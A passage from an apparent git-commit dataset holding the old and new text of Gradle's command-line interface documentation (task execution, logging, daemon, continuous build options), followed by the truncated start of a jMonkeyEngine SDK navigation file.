at the end of the build.\n\n[[sec:rich_console]]\n=== Rich Console\nGradle's rich console displays extra information while builds are running.\n\nimage::rich-cli.png[alt=\"Gradle Rich Console\"]\n\nFeatures:\n\n * Progress bar and timer visually describe overall status\n * Parallel work-in-progress lines below describe what is happening now\n * Colors and fonts are used to highlight important output and errors\n\n[[sec:command_line_execution_options]]\n== Execution options\nThe following options affect how builds are executed, by changing what is built or how dependencies are resolved.\n\n`--include-build`::\nRun the build as a composite, including the specified build. See <<composite_builds.adoc#composite_builds, Composite Builds>>.\n\n`--offline`::\nSpecifies that the build should operate without accessing network resources. Learn more about <<dynamic_versions.adoc#sec:controlling_dependency_caching_command_line,options to override dependency caching>>.\n\n`--refresh-dependencies`::\nRefresh the state of dependencies. Learn more about how to use this in the <<dynamic_versions.adoc#sec:controlling_dependency_caching_command_line,dependency management docs>>.\n\n`--dry-run`::\nRun Gradle with all task actions disabled. Use this to show which task would have executed.\n\n`--write-locks`::\nIndicates that all resolved configurations that are _lockable_ should have their lock state persisted.\nLearn more about this in <<dependency_locking.adoc#dependency-locking,dependency locking>>.\n\n`--update-locks <group:name>[,<group:name>]*`::\nIndicates that versions for the specified modules have to be updated in the lock file.\nThis flag also implies `--write-locks`.\nLearn more about this in <<dependency_locking.adoc#dependency-locking,dependency locking>>.\n\n`--no-rebuild`::\nDo not rebuild project dependencies.\nUseful for <<organizing_gradle_projects.adoc#sec:build_sources, debugging and fine-tuning `buildSrc`>>, but can lead to wrong results. Use with caution!\n\n[[sec:environment_options]]\n== Environment options\nYou can customize many aspects about where build scripts, settings, caches, and so on through the options below. Learn more about customizing your <<build_environment.adoc#build_environment, build environment>>.\n\n`-b`, `--build-file` (deprecated)::\nSpecifies the build file. For example: `gradle --build-file=foo.gradle`. The default is `build.gradle`, then `build.gradle.kts`.\n\n`-c`, `--settings-file` (deprecated)::\nSpecifies the settings file. For example: `gradle --settings-file=somewhere\/else\/settings.gradle`\n\n`-g`, `--gradle-user-home`::\nSpecifies the Gradle user home directory. The default is the `.gradle` directory in the user's home directory.\n\n`-p`, `--project-dir`::\nSpecifies the start directory for Gradle. Defaults to current directory.\n\n`--project-cache-dir`::\nSpecifies the project-specific cache directory. Default value is `.gradle` in the root project directory.\n\n`-D`, `--system-prop`::\nSets a system property of the JVM, for example `-Dmyprop=myvalue`. See <<build_environment.adoc#sec:gradle_system_properties,System Properties>>.\n\n`-I`, `--init-script`::\nSpecifies an initialization script. See <<init_scripts.adoc#init_scripts,Init Scripts>>.\n\n`-P`, `--project-prop`::\nSets a project property of the root project, for example `-Pmyprop=myvalue`. See <<build_environment.adoc#sec:project_properties,Project Properties>>.\n\n`-Dorg.gradle.jvmargs`::\nSet JVM arguments.\n\n`-Dorg.gradle.java.home`::\nSet JDK home dir.\n\n[[sec:command_line_bootstrapping_projects]]\n== Bootstrapping new projects\n\n=== Creating new Gradle builds\nUse the built-in `gradle init` task to create a new Gradle builds, with new or existing projects.\n\n----\n$ gradle init\n----\n\nMost of the time you'll want to specify a project type. Available types include `basic` (default), `java-library`, `java-application`, and more. See <<build_init_plugin.adoc#build_init_plugin, init plugin documentation>> for details.\n\n----\n$ gradle init --type java-library\n----\n\n=== Standardize and provision Gradle\nThe built-in `gradle wrapper` task generates a script, `gradlew`, that invokes a declared version of Gradle, downloading it beforehand if necessary.\n\n----\n$ gradle wrapper --gradle-version=4.4\n----\n\nYou can also specify `--distribution-type=(bin|all)`, `--gradle-distribution-url`, `--gradle-distribution-sha256-sum` in addition to `--gradle-version`. Full details on how to use these options are documented in the <<gradle_wrapper.adoc#gradle_wrapper,Gradle wrapper section>>.\n\n[[sec:continuous_build]]\n== Continuous Build\n\nContinuous Build allows you to automatically re-execute the requested tasks when task inputs change.\n\nFor example, you can continuously run the `test` task and all dependent tasks by running:\n\n----\n$ gradle test --continuous\n----\n\nGradle will behave as if you ran `gradle test` after a change to sources or tests that contribute to the requested tasks. This means that unrelated changes (such as changes to build scripts) will not trigger a rebuild. In order to incorporate build logic changes, the continuous build must be restarted manually.\n\n=== Terminating Continuous Build\n\nIf Gradle is attached to an interactive input source, such as a terminal, the continuous build can be exited by pressing `CTRL-D` (On Microsoft Windows, it is required to also press `ENTER` or `RETURN` after `CTRL-D`). If Gradle is not attached to an interactive input source (e.g. is running as part of a script), the build process must be terminated (e.g. using the `kill` command or similar). If the build is being executed via the Tooling API, the build can be cancelled using the Tooling API's cancellation mechanism.\n\n[[continuous_build_limitations]]\n=== Limitations and quirks\n\nThere are several issues to be aware with the current implementation of continuous build. These are likely to be addressed in future Gradle releases.\n\n[[sec:build_cycles]]\n==== Build cycles\n\nGradle starts watching for changes just before a task executes. If a task modifies its own inputs while executing, Gradle will detect the change and trigger a new build. If every time the task executes, the inputs are modified again, the build will be triggered again. This isn't unique to continuous build. A task that modifies its own inputs will never be considered up-to-date when run \"normally\" without continuous build.\n\nIf your build enters a build cycle like this, you can track down the task by looking at the list of files reported changed by Gradle. After identifying the file(s) that are changed during each build, you should look for a task that has that file as an input. In some cases, it may be obvious (e.g., a Java file is compiled with `compileJava`). In other cases, you can use `--info` logging to find the task that is out-of-date due to the identified files.\n\n[[sec:continuous_build_limitations_jdk9]]\n==== Restrictions with Java 9\n\nDue to class access restrictions related to Java 9, Gradle cannot set some operating system specific options, which means that:\n\n* On macOS, Gradle will poll for file changes every 10 seconds instead of every 2 seconds.\n* On Windows, Gradle must use individual file watches (like on Linux\/Mac OS), which may cause continuous build to no longer work on very large projects.\n\n[[sec:performance_and_stability]]\n==== Performance and stability\n\nThe JDK file watching facility relies on inefficient file system polling on macOS (see: https:\/\/bugs.openjdk.java.net\/browse\/JDK-7133447[JDK-7133447]). This can significantly delay notification of changes on large projects with many source files.\n\nAdditionally, the watching mechanism may deadlock under _heavy_ load on macOS (see: https:\/\/bugs.openjdk.java.net\/browse\/JDK-8079620[JDK-8079620]). This will manifest as Gradle appearing not to notice file changes. If you suspect this is occurring, exit continuous build and start again.\n\nOn Linux, OpenJDK's implementation of the file watch service can sometimes miss file system events (see: https:\/\/bugs.openjdk.java.net\/browse\/JDK-8145981[JDK-8145981]).\n\n[[sec:changes_to_symbolic_links]]\n==== Changes to symbolic links\n\n * Creating or removing symbolic link to files will initiate a build.\n * Modifying the target of a symbolic link will not cause a rebuild.\n * Creating or removing symbolic links to directories will not cause rebuilds.\n * Creating new files in the target directory of a symbolic link will not cause a rebuild.\n * Deleting the target directory will not cause a rebuild.\n\n[[sec:changes_to_build_logic_are_not_considered]]\n==== Changes to build logic are not considered\n\nThe current implementation does not recalculate the build model on subsequent builds. This means that changes to task configuration, or any other change to the build model, are effectively ignored.\n","old_contents":"\/\/ Copyright 2017 the original author or authors.\n\/\/\n\/\/ Licensed under the Apache License, Version 2.0 (the \"License\");\n\/\/ you may not use this file except in compliance with the License.\n\/\/ You may obtain a copy of the License at\n\/\/\n\/\/ http:\/\/www.apache.org\/licenses\/LICENSE-2.0\n\/\/\n\/\/ Unless required by applicable law or agreed to in writing, software\n\/\/ distributed under the License is distributed on an \"AS IS\" BASIS,\n\/\/ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n\/\/ See the License for the specific language governing permissions and\n\/\/ limitations under the License.\n\n[[command_line_interface]]\n= Command-Line Interface\n\n[.lead]\nThe command-line interface is one of the primary methods of interacting with Gradle. The following serves as a reference of executing and customizing Gradle use of a command-line or when writing scripts or configuring continuous integration.\n\nUse of the <<gradle_wrapper.adoc#gradle_wrapper, Gradle Wrapper>> is highly encouraged. You should substitute `.\/gradlew` or `gradlew.bat` for `gradle` in all following examples when using the Wrapper.\n\nExecuting Gradle on the command-line conforms to the following structure. Options are allowed before and after task names.\n----\ngradle [taskName...] [--option-name...]\n----\n\nIf multiple tasks are specified, they should be separated with a space.\n\nOptions that accept values can be specified with or without `=` between the option and argument; however, use of `=` is recommended.\n----\n--console=plain\n----\n\nOptions that enable behavior have long-form options with inverses specified with `--no-`. The following are opposites.\n----\n--build-cache\n--no-build-cache\n----\n\nMany long-form options, have short option equivalents. The following are equivalent:\n----\n--help\n-h\n----\n\n[NOTE]\n====\nMany command-line flags can be specified in `gradle.properties` to avoid needing to be typed. See the <<build_environment.adoc#sec:gradle_configuration_properties, configuring build environment guide>> for details.\n====\n\nThe following sections describe use of the Gradle command-line interface, grouped roughly by user goal. Some plugins also add their own command line options, for example <<java_testing.adoc#test_filtering,`--tests` for Java test filtering>>. For more information on exposing command line options for your own tasks, see <<custom_tasks.adoc#sec:declaring_and_using_command_line_options,Declaring and using command-line options>>.\n\n[[sec:command_line_executing_tasks]]\n== Executing tasks\n\nYou can learn about what projects and tasks are available in the <<#sec:command_line_project_reporting, project reporting section>>.\nMost builds support a common set of tasks known as <<more_about_tasks#sec:lifecycle_tasks,_lifecycle tasks_>>. These include the `build`, `assemble`, and `check` tasks.\n\nIn order to execute a task called \"myTask\" on the root project, type:\n----\n$ gradle :myTask\n----\n\nThis will run the single \"myTask\" and also all of its <<tutorial_using_tasks.adoc#sec:task_dependencies,task dependencies>>.\n\n[[executing_tasks_in_multi_project_builds]]\n=== Executing tasks in multi-project builds\n\nIn a <<intro_multi_project_builds.adoc#intro_multi_project_builds, multi-project build>>, subproject tasks can be executed with \":\" separating subproject name and task name.\nThe following are equivalent _when run from the root project_:\n----\n$ gradle :my-subproject:taskName\n$ gradle my-subproject:taskName\n----\n\nYou can also run a task for _all_ subprojects by using a task _selector_ that consists of the task name only.\nFor example, this will run the \"test\" task for all subprojects when invoked from the root project directory:\n----\n$ gradle test\n----\n\n[NOTE]\n====\nSome tasks selectors, like `help` or `dependencies`, will only run the task on the project they are invoked on and not on all the subprojects.\nThe main motivation for this is that these tasks print out information that would be hard to process if it combined the information from all projects.\n====\n\nWhen invoking Gradle from within a subproject, the project name should be omitted:\n----\n$ cd my-subproject\n$ gradle taskName\n----\n\n[NOTE]\n====\nWhen executing the Gradle Wrapper from subprojects, one must reference `gradlew` relatively. For example: `..\/gradlew taskName`. The community http:\/\/www.gdub.rocks\/[gdub project] aims to make this more convenient.\n====\n\n=== Executing multiple tasks\nYou can also specify multiple tasks. For example, the following will execute the `test` and `deploy` tasks in the order that they are listed on the command-line and will also execute the dependencies for each task.\n\n----\n$ gradle test deploy\n----\n\n[[sec:excluding_tasks_from_the_command_line]]\n=== Excluding tasks from execution\nYou can exclude a task from being executed using the `-x` or `--exclude-task` command-line option and providing the name of the task to exclude.\n\n.Simple Task Graph\nimage::commandLineTutorialTasks.png[]\n\n.Excluding tasks\n----\n$ gradle dist --exclude-task test\ninclude::{snippetsPath}\/tutorial\/excludeTasks\/tests\/excludeTask.out[]\n----\n\nYou can see that the `test` task is not executed, even though it is a dependency of the `dist` task. The `test` task's dependencies such as `compileTest` are not executed either. Those dependencies of `test` that are required by another task, such as `compile`, are still executed.\n\n[[sec:rerun_tasks]]\n=== Forcing tasks to execute\n\nYou can force Gradle to execute all tasks ignoring <<more_about_tasks.adoc#sec:up_to_date_checks,up-to-date checks>> using the `--rerun-tasks` option:\n\n----\n$ gradle test --rerun-tasks\n----\n\nThis will force `test` and _all_ task dependencies of `test` to execute. It's a little like running `gradle clean test`, but without the build's generated output being deleted.\n\n[[sec:continue_build_on_failure]]\n=== Continuing the build when a failure occurs\n\nBy default, Gradle will abort execution and fail the build as soon as any task fails. This allows the build to complete sooner, but hides other failures that would have occurred. In order to discover as many failures as possible in a single build execution, you can use the `--continue` option.\n\n----\n$ gradle test --continue\n----\n\nWhen executed with `--continue`, Gradle will execute _every_ task to be executed where all of the dependencies for that task completed without failure, instead of stopping as soon as the first failure is encountered. Each of the encountered failures will be reported at the end of the build.\n\nIf a task fails, any subsequent tasks that were depending on it will not be executed. For example, tests will not run if there is a compilation failure in the code under test; because the test task will depend on the compilation task (either directly or indirectly).\n\n[[sec:name_abbreviation]]\n=== Name abbreviation\n\nWhen you specify tasks on the command-line, you don\u2019t have to provide the full name of the task. You only need to provide enough of the task name to uniquely identify the task. For example, it's likely `gradle che` is enough for Gradle to identify the `check` task.\n\nThe same applies for project names. You can execute the `check` task in the `library` subproject with the `gradle lib:che` command.\n\nYou can use https:\/\/en.wikipedia.org\/wiki\/Camel_case[camel case] patterns for more complex abbreviations. These patterns are expanded to match camel case and https:\/\/en.wikipedia.org\/wiki\/Kebab_case[kebab case] names. For example the pattern `foBa` (or even `fB`) matches `fooBar` and `foo-bar`.\n\nMore concretely, you can run the `compileTest` task in the `my-awesome-library` subproject with the `gradle mAL:cT` command.\n\n.Abbreviated project and task names\n----\n$ gradle mAL:cT\ninclude::{snippetsPath}\/tutorial\/nameMatching\/tests\/nameMatching.out[]\n----\n\nYou can also use these abbreviations with the -x command-line option.\n\n== Common tasks\n\nThe following are task conventions applied by built-in and most major Gradle plugins.\n\n=== Computing all outputs\n\nIt is common in Gradle builds for the `build` task to designate assembling all outputs and running all checks.\n\n----\n$ gradle build\n----\n\n=== Running applications\n\nIt is common for applications to be run with the `run` task, which assembles the application and executes some script or binary.\n\n----\n$ gradle run\n----\n\n=== Running all checks\n\nIt is common for _all_ verification tasks, including tests and linting, to be executed using the `check` task.\n\n----\n$ gradle check\n----\n\n=== Cleaning outputs\n\nYou can delete the contents of the build directory using the `clean` task, though doing so will cause pre-computed outputs to be lost, causing significant additional build time for the subsequent task execution.\n\n----\n$ gradle clean\n----\n\n[[sec:command_line_project_reporting]]\n== Project reporting\n\nGradle provides several built-in tasks which show particular details of your build. This can be useful for understanding the structure and dependencies of your build, and for debugging problems.\n\nYou can get basic help about available reporting options using `gradle help`.\n\n=== Listing projects\n\nRunning `gradle projects` gives you a list of the sub-projects of the selected project, displayed in a hierarchy.\n\n----\n$ gradle projects\n----\n\nYou also get a project report within build scans. Learn more about https:\/\/scans.gradle.com\/[creating build scans].\n\n[[sec:listing_tasks]]\n=== Listing tasks\n\nRunning `gradle tasks` gives you a list of the main tasks of the selected project. This report shows the default tasks for the project, if any, and a description for each task.\n\n----\n$ gradle tasks\n----\n\nBy default, this report shows only those tasks which have been assigned to a task group. You can obtain more information in the task listing using the `--all` option.\n\n----\n$ gradle tasks --all\n----\n\nIf you need to be more precise, you can display only the tasks from a specific group using the `--group` option.\n\n----\n$ gradle tasks --group=\"build setup\"\n----\n\n[[sec:show_task_details]]\n=== Show task usage details\n\nRunning `gradle help --task someTask` gives you detailed information about a specific task.\n\n.Obtaining detailed help for tasks\n----\n$ gradle -q help --task libs\ninclude::{snippetsPath}\/tutorial\/projectReports\/tests\/taskHelp.out[]\n----\n\nThis information includes the full task path, the task type, possible command line options and the description of the given task.\n\n=== Reporting dependencies\n\nBuild scans give a full, visual report of what dependencies exist on which configurations, transitive dependencies, and dependency version selection.\n\n----\n$ gradle myTask --scan\n----\n\nThis will give you a link to a web-based report, where you can find dependency information like this.\n\nimage::gradle-core-test-build-scan-dependencies.png[Build Scan dependencies report]\n\nLearn more in <<viewing_debugging_dependencies.adoc#viewing-debugging-dependencies,Viewing and debugging dependencies>>.\n\n=== Listing project dependencies\n\nRunning `gradle dependencies` gives you a list of the dependencies of the selected project, broken down by configuration. For each configuration, the direct and transitive dependencies of that configuration are shown in a tree. Below is an example of this report:\n\n----\n$ gradle dependencies\n----\n\nConcrete examples of build scripts and output available in the <<viewing_debugging_dependencies.adoc#viewing-debugging-dependencies,Viewing and debugging dependencies>>.\n\nRunning `gradle buildEnvironment` visualises the buildscript dependencies of the selected project, similarly to how `gradle dependencies` visualizes the dependencies of the software being built.\n\n----\n$ gradle buildEnvironment\n----\n\nRunning `gradle dependencyInsight` gives you an insight into a particular dependency (or dependencies) that match specified input.\n\n----\n$ gradle dependencyInsight\n----\n\nSince a dependency report can get large, it can be useful to restrict the report to a particular configuration. This is achieved with the optional `--configuration` parameter:\n\n[[sec:listing_properties]]\n=== Listing project properties\n\nRunning `gradle properties` gives you a list of the properties of the selected project.\n\n.Information about properties\n----\n$ gradle -q api:properties\ninclude::{snippetsPath}\/tutorial\/projectReports\/tests\/propertyListReport.out[]\n----\n\n[[sec:command_line_completion]]\n== Command-line completion\n\nGradle provides bash and zsh tab completion support for tasks, options, and Gradle properties through https:\/\/github.com\/gradle\/gradle-completion[gradle-completion], installed separately.\n\n.Gradle Completion\nimage::gradle-completion-4.0.gif[]\n\n[[sec:command_line_debugging]]\n== Debugging options\n\n`-?`, `-h`, `--help`::\nShows a help message with all available CLI options.\n\n`-v`, `--version`::\nPrints Gradle, Groovy, Ant, JVM, and operating system version information.\n\n`-S`, `--full-stacktrace`::\nPrint out the full (very verbose) stacktrace for any exceptions. See also <<#sec:command_line_logging, logging options>>.\n\n`-s`, `--stacktrace`::\nPrint out the stacktrace also for user exceptions (e.g. compile error). See also <<#sec:command_line_logging, logging options>>.\n\n`--scan`::\nCreate a https:\/\/gradle.com\/build-scans[build scan] with fine-grained information about all aspects of your Gradle build.\n\n`-Dorg.gradle.debug=true`::\nDebug Gradle client (non-Daemon) process. Gradle will wait for you to attach a debugger at `localhost:5005` by default.\n\n`-Dorg.gradle.debug.port=(port number)`::\nSpecifies the port number on which process is listening when debug is enabled. _Default is `5005`._\n\n`-Dorg.gradle.debug.server=true`::\nIf set to `true` and debugging is enabled, Gradle will run the build with the socket-attach mode of the debugger. Otherwise, the socket-listen mode is used.\n\n`-Dorg.gradle.debug.suspend=true`::\nWhen set to `true` and debugging is enabled, the JVM running Gradle will suspend until a debugger is attached.\n\n`-Dorg.gradle.daemon.debug=true`::\nDebug <<gradle_daemon.adoc#gradle_daemon, Gradle Daemon>> process.\n\n[[sec:command_line_performance]]\n== Performance options\nTry these options when optimizing build performance. Learn more about <<performance.adoc#performance_gradle,improving performance of Gradle builds here>>.\n\nMany of these options can be specified in `gradle.properties` so command-line flags are not necessary. See the <<build_environment.adoc#sec:gradle_configuration_properties, configuring build environment guide>>.\n\n`--build-cache`, `--no-build-cache`::\nToggles the <<build_cache.adoc#build_cache, Gradle build cache>>. Gradle will try to reuse outputs from previous builds. _Default is off_.\n\n`--configure-on-demand`, `--no-configure-on-demand`::\nToggles <<multi_project_configuration_and_execution.adoc#sec:configuration_on_demand, Configure-on-demand>>. Only relevant projects are configured in this build run. _Default is off_.\n\n`--max-workers`::\nSets maximum number of workers that Gradle may use. _Default is number of processors_.\n\n`--parallel`, `--no-parallel`::\nBuild projects in parallel. For limitations of this option, see <<multi_project_configuration_and_execution.adoc#sec:parallel_execution, Parallel Project Execution>>. _Default is off_.\n\n`--priority`::\nSpecifies the scheduling priority for the Gradle daemon and all processes launched by it. Values are `normal` or `low`. _Default is normal_.\n\n`--profile`::\nGenerates a high-level performance report in the `$buildDir\/reports\/profile` directory. `--scan` is preferred.\n\n`--scan`::\nGenerate a build scan with detailed performance diagnostics.\n\nimage::gradle-core-test-build-scan-performance.png[Build Scan performance report]\n\n`--watch-fs`, `--no-watch-fs`::\nToggles <<gradle_daemon.adoc#sec:daemon_watch_fs,watching the file system>>.\nWhen enabled Gradle re-uses information it collects about the file system between builds.\n_Enabled by default on operating systems where Gradle supports this feature._\n\n=== Gradle daemon options\nYou can manage the <<gradle_daemon.adoc#gradle_daemon,Gradle Daemon>> through the following command line options.\n\n`--daemon`, `--no-daemon`::\nUse the <<gradle_daemon.adoc#gradle_daemon, Gradle Daemon>> to run the build. Starts the daemon if not running or existing daemon busy. _Default is on_.\n\n`--foreground`::\nStarts the Gradle Daemon in a foreground process.\n\n`--status` (Standalone command)::\nRun `gradle --status` to list running and recently stopped Gradle daemons. Only displays daemons of the same Gradle version.\n\n`--stop` (Standalone command)::\nRun `gradle --stop` to stop all Gradle Daemons of the same version.\n\n`-Dorg.gradle.daemon.idletimeout=(number of milliseconds)`::\nGradle Daemon will stop itself after this number of milliseconds of idle time. _Default is 10800000_ (3 hours).\n\n\n[[sec:command_line_logging]]\n== Logging options\n\n=== Setting log level\nYou can customize the verbosity of Gradle logging with the following options, ordered from least verbose to most verbose. Learn more in the <<logging.adoc#logging, logging documentation>>.\n\n`-Dorg.gradle.logging.level=(quiet,warn,lifecycle,info,debug)`::\nSet logging level via Gradle properties.\n\n`-q`, `--quiet`::\nLog errors only.\n\n`-w`, `--warn`::\nSet log level to warn.\n\n`-i`, `--info`::\nSet log level to info.\n\n`-d`, `--debug`::\nLog in debug mode (includes normal stacktrace).\n\nLifecycle is the default log level.\n\n[[sec:command_line_customizing_log_format]]\n=== Customizing log format\nYou can control the use of rich output (colors and font variants) by specifying the \"console\" mode in the following ways:\n\n`-Dorg.gradle.console=(auto,plain,rich,verbose)`::\nSpecify console mode via Gradle properties. Different modes described immediately below.\n\n`--console=(auto,plain,rich,verbose)`::\nSpecifies which type of console output to generate.\n+\nSet to `plain` to generate plain text only. This option disables all color and other rich output in the console output. This is the default when Gradle is _not_ attached to a terminal.\n+\nSet to `auto` (the default) to enable color and other rich output in the console output when the build process is attached to a console, or to generate plain text only when not attached to a console. _This is the default when Gradle is attached to a terminal._\n+\nSet to `rich` to enable color and other rich output in the console output, regardless of whether the build process is not attached to a console. When not attached to a console, the build output will use ANSI control characters to generate the rich output.\n+\nSet to `verbose` to enable color and other rich output like the `rich`, but output task names and outcomes at the lifecycle log level, as is done by default in Gradle 3.5 and earlier.\n\n[[sec:command_line_warnings]]\n=== Showing or hiding warnings\nBy default, Gradle won't display all warnings (e.g. deprecation warnings). Instead, Gradle will collect them and render a summary at the end of the build like:\n\n----\nDeprecated Gradle features were used in this build, making it incompatible with Gradle 5.0.\n----\n\nYou can control the verbosity of warnings on the console with the following options:\n\n`-Dorg.gradle.warning.mode=(all,fail,none,summary)`::\nSpecify warning mode via <<build_environment.adoc#sec:gradle_configuration_properties, Gradle properties>>. Different modes described immediately below.\n\n`--warning-mode=(all,fail,none,summary)`::\nSpecifies how to log warnings. Default is `summary`.\n+\nSet to `all` to log all warnings.\n+\nSet to `fail` to log all warnings and fail the build if there are any warnings.\n+\nSet to `summary` to suppress all warnings and log a summary at the end of the build.\n+\nSet to `none` to suppress all warnings, including the summary at the end of the build.\n\n[[sec:rich_console]]\n=== Rich Console\nGradle's rich console displays extra information while builds are running.\n\nimage::rich-cli.png[alt=\"Gradle Rich Console\"]\n\nFeatures:\n\n * Progress bar and timer visually describe overall status\n * Parallel work-in-progress lines below describe what is happening now\n * Colors and fonts are used to highlight important output and errors\n\n[[sec:command_line_execution_options]]\n== Execution options\nThe following options affect how builds are executed, by changing what is built or how dependencies are resolved.\n\n`--include-build`::\nRun the build as a composite, including the specified build. See <<composite_builds.adoc#composite_builds, Composite Builds>>.\n\n`--offline`::\nSpecifies that the build should operate without accessing network resources. Learn more about <<dynamic_versions.adoc#sec:controlling_dependency_caching_command_line,options to override dependency caching>>.\n\n`--refresh-dependencies`::\nRefresh the state of dependencies. Learn more about how to use this in the <<dynamic_versions.adoc#sec:controlling_dependency_caching_command_line,dependency management docs>>.\n\n`--dry-run`::\nRun Gradle with all task actions disabled. Use this to show which task would have executed.\n\n`--write-locks`::\nIndicates that all resolved configurations that are _lockable_ should have their lock state persisted.\nLearn more about this in <<dependency_locking.adoc#dependency-locking,dependency locking>>.\n\n`--update-locks <group:name>[,<group:name>]*`::\nIndicates that versions for the specified modules have to be updated in the lock file.\nThis flag also implies `--write-locks`.\nLearn more about this in <<dependency_locking.adoc#dependency-locking,dependency locking>>.\n\n`--no-rebuild`::\nDo not rebuild project dependencies.\nUseful for <<organizing_gradle_projects.adoc#sec:build_sources, debugging and fine-tuning `buildSrc`>>, but can lead to wrong results. Use with caution!\n\n[[sec:environment_options]]\n== Environment options\nYou can customize many aspects about where build scripts, settings, caches, and so on through the options below. Learn more about customizing your <<build_environment.adoc#build_environment, build environment>>.\n\n`-b`, `--build-file` (deprecated)::\nSpecifies the build file. For example: `gradle --build-file=foo.gradle`. The default is `build.gradle`, then `build.gradle.kts`.\n\n`-c`, `--settings-file` (deprecated)::\nSpecifies the settings file. For example: `gradle --settings-file=somewhere\/else\/settings.gradle`\n\n`-g`, `--gradle-user-home`::\nSpecifies the Gradle user home directory. The default is the `.gradle` directory in the user's home directory.\n\n`-p`, `--project-dir`::\nSpecifies the start directory for Gradle. Defaults to current directory.\n\n`--project-cache-dir`::\nSpecifies the project-specific cache directory. Default value is `.gradle` in the root project directory.\n\n`-D`, `--system-prop`::\nSets a system property of the JVM, for example `-Dmyprop=myvalue`. See <<build_environment.adoc#sec:gradle_system_properties,System Properties>>.\n\n`-I`, `--init-script`::\nSpecifies an initialization script. See <<init_scripts.adoc#init_scripts,Init Scripts>>.\n\n`-P`, `--project-prop`::\nSets a project property of the root project, for example `-Pmyprop=myvalue`. See <<build_environment.adoc#sec:project_properties,Project Properties>>.\n\n`-Dorg.gradle.jvmargs`::\nSet JVM arguments.\n\n`-Dorg.gradle.java.home`::\nSet JDK home dir.\n\n[[sec:command_line_bootstrapping_projects]]\n== Bootstrapping new projects\n\n=== Creating new Gradle builds\nUse the built-in `gradle init` task to create a new Gradle builds, with new or existing projects.\n\n----\n$ gradle init\n----\n\nMost of the time you'll want to specify a project type. Available types include `basic` (default), `java-library`, `java-application`, and more. See <<build_init_plugin.adoc#build_init_plugin, init plugin documentation>> for details.\n\n----\n$ gradle init --type java-library\n----\n\n=== Standardize and provision Gradle\nThe built-in `gradle wrapper` task generates a script, `gradlew`, that invokes a declared version of Gradle, downloading it beforehand if necessary.\n\n----\n$ gradle wrapper --gradle-version=4.4\n----\n\nYou can also specify `--distribution-type=(bin|all)`, `--gradle-distribution-url`, `--gradle-distribution-sha256-sum` in addition to `--gradle-version`. Full details on how to use these options are documented in the <<gradle_wrapper.adoc#gradle_wrapper,Gradle wrapper section>>.\n\n[[sec:continuous_build]]\n== Continuous Build\n\nContinuous Build allows you to automatically re-execute the requested tasks when task inputs change.\n\nFor example, you can continuously run the `test` task and all dependent tasks by running:\n\n----\n$ gradle test --continuous\n----\n\nGradle will behave as if you ran `gradle test` after a change to sources or tests that contribute to the requested tasks. This means that unrelated changes (such as changes to build scripts) will not trigger a rebuild. In order to incorporate build logic changes, the continuous build must be restarted manually.\n\n=== Terminating Continuous Build\n\nIf Gradle is attached to an interactive input source, such as a terminal, the continuous build can be exited by pressing `CTRL-D` (On Microsoft Windows, it is required to also press `ENTER` or `RETURN` after `CTRL-D`). If Gradle is not attached to an interactive input source (e.g. is running as part of a script), the build process must be terminated (e.g. using the `kill` command or similar). If the build is being executed via the Tooling API, the build can be cancelled using the Tooling API's cancellation mechanism.\n\n[[continuous_build_limitations]]\n=== Limitations and quirks\n\nThere are several issues to be aware with the current implementation of continuous build. These are likely to be addressed in future Gradle releases.\n\n[[sec:build_cycles]]\n==== Build cycles\n\nGradle starts watching for changes just before a task executes. If a task modifies its own inputs while executing, Gradle will detect the change and trigger a new build. If every time the task executes, the inputs are modified again, the build will be triggered again. This isn't unique to continuous build. A task that modifies its own inputs will never be considered up-to-date when run \"normally\" without continuous build.\n\nIf your build enters a build cycle like this, you can track down the task by looking at the list of files reported changed by Gradle. After identifying the file(s) that are changed during each build, you should look for a task that has that file as an input. In some cases, it may be obvious (e.g., a Java file is compiled with `compileJava`). In other cases, you can use `--info` logging to find the task that is out-of-date due to the identified files.\n\n[[sec:continuous_build_limitations_jdk9]]\n==== Restrictions with Java 9\n\nDue to class access restrictions related to Java 9, Gradle cannot set some operating system specific options, which means that:\n\n* On macOS, Gradle will poll for file changes every 10 seconds instead of every 2 seconds.\n* On Windows, Gradle must use individual file watches (like on Linux\/Mac OS), which may cause continuous build to no longer work on very large projects.\n\n[[sec:performance_and_stability]]\n==== Performance and stability\n\nThe JDK file watching facility relies on inefficient file system polling on macOS (see: https:\/\/bugs.openjdk.java.net\/browse\/JDK-7133447[JDK-7133447]). This can significantly delay notification of changes on large projects with many source files.\n\nAdditionally, the watching mechanism may deadlock under _heavy_ load on macOS (see: https:\/\/bugs.openjdk.java.net\/browse\/JDK-8079620[JDK-8079620]). This will manifest as Gradle appearing not to notice file changes. If you suspect this is occurring, exit continuous build and start again.\n\nOn Linux, OpenJDK's implementation of the file watch service can sometimes miss file system events (see: https:\/\/bugs.openjdk.java.net\/browse\/JDK-8145981[JDK-8145981]).\n\n[[sec:changes_to_symbolic_links]]\n==== Changes to symbolic links\n\n * Creating or removing symbolic link to files will initiate a build.\n * Modifying the target of a symbolic link will not cause a rebuild.\n * Creating or removing symbolic links to directories will not cause rebuilds.\n * Creating new files in the target directory of a symbolic link will not cause a rebuild.\n * Deleting the target directory will not cause a rebuild.\n\n[[sec:changes_to_build_logic_are_not_considered]]\n==== Changes to build logic are not considered\n\nThe current implementation does not recalculate the build model on subsequent builds. This means that changes to task configuration, or any other change to the build model, are effectively ignored.\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"00394d0e7465245f1dbb465f2a78592dd590756a","subject":"point to sdk page","message":"point to sdk page\n","repos":"jMonkeyEngine\/wiki.jmonkeyengine.org,jMonkeyEngine\/wiki.jmonkeyengine.org,jMonkeyEngine\/wiki.jmonkeyengine.org,jMonkeyEngine\/wiki.jmonkeyengine.org","old_file":"docs\/modules\/sdk\/nav.adoc","new_file":"docs\/modules\/sdk\/nav.adoc","new_contents":"* xref:sdk.adoc[SDK]\n** Video Tutorials\n*** SDK Use Case Tutorials\n**** link:http:\/\/www.youtube.com\/watch?v=-OzRZscLlHY[Demo 1 (Quixote demo)]\n**** link:http:\/\/www.youtube.com\/watch?v=6-YWxD3JByE[Demo 2 (Models and Materials)]\n*** SDK Tutorials\n**** link:http:\/\/www.youtube.com\/watch?v=M1_0pbeyJzI[Basics]\n**** link:http:\/\/www.youtube.com\/watch?v=nL7woH40i5c[Importing Models]\n**** link:http:\/\/www.youtube.com\/watch?v=DUmgAjiNzhY[Dragging&Dropping Nodes]\n**** 